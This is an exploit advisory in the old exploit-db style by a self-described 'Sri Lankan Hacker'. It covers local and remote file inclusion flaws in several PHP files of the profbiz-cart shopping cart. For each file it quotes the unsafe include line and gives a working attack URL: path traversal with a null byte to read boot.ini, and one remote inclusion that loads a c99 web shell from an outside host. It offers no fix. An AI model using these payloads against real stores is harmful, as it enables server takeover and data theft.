1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 |
# Author: Zer0 Thunder # Site : http://www.profitcode.net/ - http://profbiz-cart.sourceforge.net/ # Tested on: Windows XP sp2 [WampServer 2.0i] - There are Cople of pages that has the LFI vuln Vuln c0de : dl-authcontent.php ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ $returlvar = "dloads"; include "$docroot" . "tplates/usrauthlogin.php"; exit; ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Exploit : http://server/store/dloads/dloadsmainincs/dl-authcontent.php?docroot=[LFI] Sample : http://server/store/dloads/dloadsmainincs/dl-authcontent.php?docroot=../../../../../boot.ini%00 *************************************************************************************************** vuln c0de : dl-maincatsearch-dlcontent.php ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ include("$docroot" . "shopincs/catpgtop$langFile.php"); ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Exploit http://server/store/dloads/dloadsmainincs/dl-maincatsearch-dlcontent.php?docroot=[LFI] Sample http://server/store/dloads/dloadsmainincs/dl-maincatsearch-dlcontent.php?docroot=../../../../../boot.ini%00 Vuln c0de : dloads-payed.php ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ include "$docroot" . "tplates/usrauthlogin.php"; ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Exploit http://server/store/dloads/dloadstplates/dloads-payed.php?docroot=[LFI] Sample http://server/store/dloads/dloadstplates/dloads-payed.php?docroot=.../../../../../../../../boot.ini%00 ************************************************************************ - For Some resons this comeup with a RFI Vuln c0de : dloads-header.php ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ include "$docroot" . "dloads/dloadsmainincs/inc-dloadsfunctions.php"; ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Exploit http://server/store/dloads/dloads-header.php?docroot=[RFI] Sample http://server/store/dloads/dloads-header.php?docroot=http://www.cfsm.cn/c99.txt?%00 ######################################## # MSN : zer0_thunder@colombohackers.com # Email : neonwarlock@live.com # Site : LKHackers.com # Greetz : To all my friends # Note : Proud to be a Sri Lankan # Me : Sri Lankan Hacker ######################################## |